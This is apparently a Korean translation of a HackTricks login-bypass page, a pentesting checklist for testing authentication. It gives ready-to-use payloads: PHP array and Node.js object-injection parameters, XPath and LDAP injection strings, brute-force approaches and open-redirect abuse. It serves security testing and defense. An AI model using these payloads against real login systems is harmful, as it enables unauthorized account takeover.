Login Bypass

HackTricks 지원하기

RootedCON스페인에서 가장 관련성 높은 사이버 보안 이벤트이며 유럽에서 가장 중요한 행사 중 하나입니다. 기술 지식을 촉진하는 임무를 가지고 이 컨그레스는 모든 분야의 기술 및 사이버 보안 전문가들이 모이는 뜨거운 만남의 장소입니다.

정상 로그인 우회

로그인 페이지를 찾으면, 이를 우회하기 위해 시도할 수 있는 몇 가지 기술이 있습니다:

  • 페이지 내 주석 확인하기 (아래로 스크롤하고 오른쪽으로?)

  • 제한된 페이지에 직접 접근할 수 있는지 확인하기

  • 매개변수를 전송하지 않기 (아무것도 전송하지 않거나 1개만 전송하기)

  • PHP 비교 오류 확인하기: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • 내용 유형을 json으로 변경하고 json 값을 전송하기 (bool true 포함)

  • POST가 지원되지 않는다는 응답을 받으면 GET 요청으로 본문에 JSON을 전송해 볼 수 있습니다. Content-Type: application/json

  • nodejs의 잠재적 파싱 오류 확인하기 (읽어보세요 이것): password[password]=1

  • Nodejs는 해당 페이로드를 다음과 유사한 쿼리로 변환합니다: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; 이는 비밀번호 비트를 항상 true로 만듭니다.

  • JSON 객체를 보낼 수 있다면 "password":{"password": 1}을 전송하여 로그인을 우회할 수 있습니다.

  • 이 로그인을 우회하려면 여전히 유효한 사용자 이름을 알고 전송해야 한다는 점을 기억하세요.

  • mysql.createConnection을 호출할 때 "stringifyObjects":true 옵션을 추가하면 매개변수로 Object가 전달될 때 모든 예기치 않은 동작을 차단할 수 있습니다.

  • 자격 증명 확인하기:

  • 사용 중인 기술/플랫폼의 기본 자격 증명

  • 일반 조합 (root, admin, password, 기술 이름, 기본 사용자 중 하나의 비밀번호).

  • Cewl을 사용하여 사전을 만들고 기본 사용자 이름과 비밀번호(있는 경우)를 추가한 후 모든 단어를 사용자 이름과 비밀번호로 사용하여 무차별 대입 시도하기

  • 더 큰 사전을 사용하여 무차별 대입하기 (무차별 대입)

SQL 인젝션 인증 우회

여기에서 SQL 인젝션을 통해 로그인을 우회하는 여러 가지 팁을 찾을 수 있습니다..

다음 페이지에서는 SQL 인젝션을 통해 로그인을 우회하기 위한 사용자 정의 목록을 찾을 수 있습니다:

Login bypass List

No SQL 인젝션 인증 우회

여기에서 No SQL 인젝션을 통해 로그인을 우회하는 여러 가지 팁을 찾을 수 있습니다..

NoSQL 인젝션은 매개변수 값을 변경해야 하므로 수동으로 테스트해야 합니다.

XPath 인젝션 인증 우회

여기에서 XPath 인젝션을 통해 로그인을 우회하는 여러 가지 팁을 찾을 수 있습니다.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection 인증 우회

여기에서 LDAP Injection을 통한 로그인 우회를 위한 여러 가지 트릭을 찾을 수 있습니다.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Remember Me

페이지에 "Remember Me" 기능이 있는 경우, 그것이 어떻게 구현되어 있는지 확인하고 다른 계정을 탈취하는 데 악용할 수 있는지 확인하세요.

Redirects

페이지는 일반적으로 로그인 후 사용자를 리디렉션합니다. 그 리디렉션을 변경하여 Open Redirect를 유발할 수 있는지 확인하세요. 사용자를 귀하의 웹사이트로 리디렉션하면 일부 정보(코드, 쿠키 등)를 훔칠 수 있을지도 모릅니다.

Other Checks

  • 로그인 기능을 악용하여 사용자 이름을 열거할 수 있는지 확인하세요.

  • 비밀번호/민감한 정보 양식 입력에서 자동 완성이 활성화되어 있는지 확인하세요: <input autocomplete="false"

​​RootedCON스페인에서 가장 관련성이 높은 사이버 보안 이벤트이며 유럽에서 가장 중요한 행사 중 하나입니다. 기술 지식을 촉진하는 사명을 가지고, 이 컨그레스는 모든 분야의 기술 및 사이버 보안 전문가들이 모이는 뜨거운 만남의 장소입니다.

Support HackTricks

Last updated